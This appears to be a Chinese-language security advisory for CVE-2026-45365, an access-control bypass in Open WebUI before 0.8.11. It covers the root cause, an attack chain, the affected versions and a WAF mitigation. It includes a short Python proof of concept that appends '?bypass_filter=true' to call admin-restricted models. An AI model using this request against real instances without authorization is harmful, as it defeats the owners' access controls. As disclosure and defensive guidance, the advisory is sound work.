IPBUF安全漏洞报告
English
CVE-2026-45365 CVSS 5.4 中危

CVE-2026-45365 Open WebUI 权限绕过漏洞

披露日期: 2026-05-15

漏洞信息

漏洞编号
CVE-2026-45365
漏洞类型
权限绕过
CVSS评分
5.4 中危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
Open WebUI

相关标签

权限绕过Open WebUI访问控制失效CVE-2026-45365FastAPI

漏洞概述

Open WebUI是一个可离线运行的自托管AI平台。在0.8.11版本之前,系统在OpenAI和Ollama的API端点上意外暴露了内部参数`bypass_filter`。由于FastAPI的查询字符串绑定机制,任何经过身份验证的低权限用户都可以通过在请求中附加`?bypass_filter=true`参数来绕过模型访问控制检查。这使得普通用户能够访问并调用仅限管理员使用的受限模型,导致权限管理失效。该漏洞已在0.8.11版本中修复。

技术细节

该漏洞的根源在于Open WebUI后端代码中使用了FastAPI框架,并错误地定义了函数参数。开发者定义了一个名为`bypass_filter`的参数用于内部逻辑判断,但并未将其显式排除在HTTP请求绑定之外。FastAPI会自动将URL查询字符串中的参数与函数参数进行匹配。因此,当攻击者向`/openai/chat/completions`或`/ollama/api/chat`等端点发送请求并附带`?bypass_filter=true`时,后端函数接收到的`bypass_filter`参数值变为`True`。这导致程序跳过了原本用于验证用户是否有权限调用特定模型的代码块,从而实现了权限提升。

攻击链分析

STEP 1
1. 信息收集与认证
攻击者注册或获取一个普通用户账户,获取有效的身份认证令牌(API Key或Session)。
STEP 2
2. 识别漏洞端点
攻击者确认目标系统使用Open WebUI,并识别出`/openai/chat/completions`等API端点。
STEP 3
3. 构造恶意请求
攻击者在正常的API请求URL中添加查询参数`?bypass_filter=true`。
STEP 4
4. 执行权限绕过
发送请求,后端因参数绑定错误而跳过权限验证,成功调用管理员模型。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Target URL url = "http://localhost:3000/openai/chat/completions" # The vulnerable parameter that bypasses access control # Setting this to 'true' skips the permission check params = { "bypass_filter": "true" } # Headers with authentication (Low privileges required) headers = { "Authorization": "Bearer <YOUR_USER_TOKEN>", "Content-Type": "application/json" } # Payload trying to access an admin-restricted model payload = { "model": "admin-restricted-model", "messages": [{"role": "user", "content": "test"}] } # Sending the exploit request response = requests.post(url, headers=headers, params=params, json=payload) if response.status_code == 200: print("[+] Vulnerability exploited! Restricted model accessed.") else: print("[-] Failed to exploit.")

影响范围

Open WebUI < 0.8.11

防御指南

临时缓解措施
若无法立即升级,建议在Web应用防火墙(WAF)或反向代理层面配置规则,过滤并阻断所有URL查询字符串中包含`bypass_filter`字段的HTTP请求,以此作为临时缓解方案。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表